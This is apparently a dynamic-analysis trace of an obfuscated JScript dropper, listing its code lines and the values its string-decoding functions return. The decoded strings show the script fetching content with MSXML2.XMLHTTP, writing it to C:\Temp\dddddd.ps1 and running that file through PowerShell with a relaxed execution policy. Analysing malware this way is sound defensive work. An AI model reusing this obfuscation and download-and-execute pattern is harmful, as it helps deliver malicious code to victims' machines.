                                                                                                                                                                • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
                                                                                                                                                                • _0x3d8f() ➔ WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                                                                62
                                                                                                                                                                return _0x2aa5 =
                                                                                                                                                                  63
                                                                                                                                                                  function (_0xe32f90, _0x265890) {
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "9716744ntollE"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                  • _0x2aa5(306,undefined) ➔ undefined
                                                                                                                                                                  • _0x2aa5(277,undefined) ➔ "5141585tSDBkb"
                                                                                                                                                                  • _0x2aa5(291,undefined) ➔ "12642224tnuDGo"
                                                                                                                                                                  • _0x2aa5(306,undefined) ➔ "9716744ntollE"
                                                                                                                                                                  64
                                                                                                                                                                  _0xe32f90 = _0xe32f90 - 0x111;
                                                                                                                                                                    65
                                                                                                                                                                    var _0xd04222 = _0x3d8f07[_0xe32f90];
                                                                                                                                                                      66
                                                                                                                                                                      if ( _0x2aa5['YxazEp'] === undefined )
                                                                                                                                                                        67
                                                                                                                                                                        {
                                                                                                                                                                          68
                                                                                                                                                                          var _0x1d860e = function (_0x5598af) {
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("124678FeSFCc") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("GET") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("W5eDD8oh") ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("WQhdRvRdTW") ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("12642224tnuDGo") ➔ undefined
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("nte0mtu4nxrtrejRyG") ➔ "5141585tSDBkb"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                          • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                          69
                                                                                                                                                                          var _0x51df1d = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                                                                            70
                                                                                                                                                                            var _0x31b964 = '', _0x154394 = '';
                                                                                                                                                                              71
                                                                                                                                                                              for ( var _0x203110 = 0x0, _0x1d9a6f, _0x3ffedd, _0x2aa5db = 0x0 ; _0x3ffedd = _0x5598af['charAt'] ( _0x2aa5db ++ ) ; ~ _0x3ffedd && ( _0x1d9a6f = _0x203110 % 0x4 ? _0x1d9a6f * 0x40 + _0x3ffedd : _0x3ffedd, _0x203110 ++ % 0x4 ) ? _0x31b964 += String['fromCharCode'] ( 0xff & _0x1d9a6f >> ( - 0x2 * _0x203110 & 0x6 ) ) : 0x0 )
                                                                                                                                                                                72
                                                                                                                                                                                {
                                                                                                                                                                                  73
                                                                                                                                                                                  _0x3ffedd = _0x51df1d['indexOf'] ( _0x3ffedd );
                                                                                                                                                                                    74
                                                                                                                                                                                    }
                                                                                                                                                                                      75
                                                                                                                                                                                      for ( var _0x2f4f63 = 0x0, _0x241040 = _0x31b964['length'] ; _0x2f4f63 < _0x241040 ; _0x2f4f63 ++ )
                                                                                                                                                                                        76
                                                                                                                                                                                        {
                                                                                                                                                                                          77
                                                                                                                                                                                          _0x154394 += '%' + ( '00' + _0x31b964['charCodeAt'] ( _0x2f4f63 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                                            78
                                                                                                                                                                                            }
                                                                                                                                                                                              79
                                                                                                                                                                                              return decodeURIComponent ( _0x154394 );
                                                                                                                                                                                              • decodeURIComponent("%d7%6e%3a%ef%c7%c4%b1%f7%02") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%39%37%31%36%37%34%34%6e%74%6f%6c%6c%45") ➔ "9716744ntollE"
                                                                                                                                                                                              • decodeURIComponent("%81%eb") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%c2%a2%c2%bf%68%c3%af%1c%c2%ad%22%c2%bb%c3%bc%4a%c2%a8%51%c2%b1%c2%8a%c3%94%c2%aa%24%6f%7d%48%c3%bf%6e%c3%8c%7b%c3%86%58") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                                              • decodeURIComponent("%c3%91%1d%77%c3%87") ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                                              • decodeURIComponent("%c2%a1%c3%ad%5a%c3%b7") ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                                              • decodeURIComponent("%d7%6e%b8%db%6d%b8%4c%d5%1d%80") ➔ undefined
                                                                                                                                                                                              • decodeURIComponent("%35%31%34%31%35%38%35%74%53%44%42%6b%62") ➔ "5141585tSDBkb"
                                                                                                                                                                                              • decodeURIComponent("%31%32%36%34%32%32%32%34%74%6e%75%44%47%6f") ➔ "12642224tnuDGo"
                                                                                                                                                                                              • decodeURIComponent("%39%37%31%36%37%34%34%6e%74%6f%6c%6c%45") ➔ "9716744ntollE"
                                                                                                                                                                                              80
                                                                                                                                                                                              };
                                                                                                                                                                                                81
                                                                                                                                                                                                _0x2aa5['zEmbtU'] = _0x1d860e, _0x52b743 = arguments, _0x2aa5['YxazEp'] = ! ! [];
                                                                                                                                                                                                  82
                                                                                                                                                                                                  }
                                                                                                                                                                                                    83
                                                                                                                                                                                                    var _0x3cf29b = _0x3d8f07[0x0], _0x360a4b = _0xe32f90 + _0x3cf29b, _0x301f1f = _0x52b743[_0x360a4b];
                                                                                                                                                                                                      84
                                                                                                                                                                                                      return ! _0x301f1f ? ( _0xd04222 = _0x2aa5['zEmbtU'] ( _0xd04222 ), _0x52b743[_0x360a4b] = _0xd04222 ) : _0xd04222 = _0x301f1f, _0xd04222;
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("124678FeSFCc") ➔ undefined
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("GET") ➔ undefined
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa") ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("W5eDD8oh") ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("WQhdRvRdTW") ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("12642224tnuDGo") ➔ undefined
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("nte0mtu4nxrtrejRyG") ➔ "5141585tSDBkb"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("mti2ndiYmJr0BNver28") ➔ "12642224tnuDGo"
                                                                                                                                                                                                      • function (_0xe32f90, _0x265890).zEmbtU("otCXnJC0ng50B2XSrq") ➔ "9716744ntollE"
                                                                                                                                                                                                      85
                                                                                                                                                                                                      }, _0x2aa5 ( _0x52b743, _0xdbcf57 );
                                                                                                                                                                                                        86
                                                                                                                                                                                                        }
                                                                                                                                                                                                          87
                                                                                                                                                                                                          function _0x5598(_0x52b743, _0xdbcf57) {
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ "\xd4\x1a\x98\xec\xb8I,\x03EQL\xd4\x17"
                                                                                                                                                                                                          • _0x5598(304,"[aOH") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ "PX<B\xdd\x11\xdeL\xe7y\xa2\x01|P>%\xbe\x92\xe1\xac\xbf\xd5\x83\xa9ZUC L\x1a\xd7)N_A-\x8a"
                                                                                                                                                                                                          • _0x5598(304,"[aOH") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ undefined
                                                                                                                                                                                                          • _0x5598(278,"E3DQ") ➔ "\xb8\xc6N\x937\x07\xa6\xa3\x0c\xb5"
                                                                                                                                                                                                          • _0x5598(304,"[aOH") ➔ "\xc3\xba\x02\xa7\xcc\x8a\xc6f>\xb1\xd0\x97N\xcd"
                                                                                                                                                                                                          88
                                                                                                                                                                                                          var _0x3d8f07 = _0x3d8f ( );
                                                                                                                                                                                                          • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                                                                                                                                          • _0x3d8f() ➔ MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28
                                                                                                                                                                                                          • _0x3d8f() ➔ 371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP
                                                                                                                                                                                                          • _0x3d8f() ➔ rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU
                                                                                                                                                                                                          • _0x3d8f() ➔ q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU
                                                                                                                                                                                                          • _0x3d8f() ➔ bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0
